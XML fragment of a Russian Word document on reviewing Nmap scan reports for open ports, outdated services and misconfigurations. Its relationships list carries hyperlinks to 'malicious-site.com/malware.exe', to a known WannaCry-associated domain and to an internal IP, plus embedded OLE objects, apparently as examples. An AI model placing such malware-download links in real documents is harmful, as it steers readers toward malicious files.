          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Конфигурация сети и неправильные конфигурации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Объяснение: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Неправильные настройки сети: Неправильно настроенные брандмауэры или сетевые параметры могут быть выявлены при сканировании.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Проблемы безопасности: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Неправильные настройки: Неправильные настройки могут привести к раскрытию внутренних служб для внешнего мира или неправильной сегментации сети, что повышает риск атак.</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Краткое содержание</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Чтобы определить наличие проблем безопасности в отчете сканирования Nmap:</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Проверьте открытые порты и службы: найдите ненужные открытые порты и устаревшие службы.</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Проверка на наличие известных уязвимостей: определите, имеют ли обнаруженные службы известные уязвимости.</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Оцените версии операционной системы и программного обеспечения: убедитесь, что они обновлены и имеют необходимые исправления.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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Расследуйте необычные службы: рассмотрите любые неожиданные службы или конфигурации, которые могут указывать на потенциальные риски безопасности.</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Анализируя эти аспекты отчета сканирования Nmap, вы можете определить потенциальные проблемы безопасности и предпринять соответствующие шаги для снижения рисков. Если вы предоставите конкретные данные из фактического отчета сканирования Nmap, может быть предложен более целенаправленный анализ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="9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w:t>
      </w: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99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
    <w:abstractNumId w:val="150"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="144"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="138"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="132"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="126"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="120"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="114"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="102"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6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iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/" Id="docRId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image2.wmf" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://10.6.100.123/news.php" Id="docRId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject2.bin" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://malicious-site.com/malware.exe" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image4.wmf" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image6.wmf" Id="docRId19"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malicious-site.com/" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject5.bin" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com&#1076;&#1077;&#1084;&#1086;&#1085;&#1089;&#1090;&#1088;&#1080;&#1088;&#1091;&#1077;&#1090;/" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"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numbering.xml" Id="docRId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship Target="media/image0.wmf" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject4.bin" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="embeddings/oleObject6.bin" Id="docRId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="embeddings/oleObject0.bin" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /></Relationships>
</file>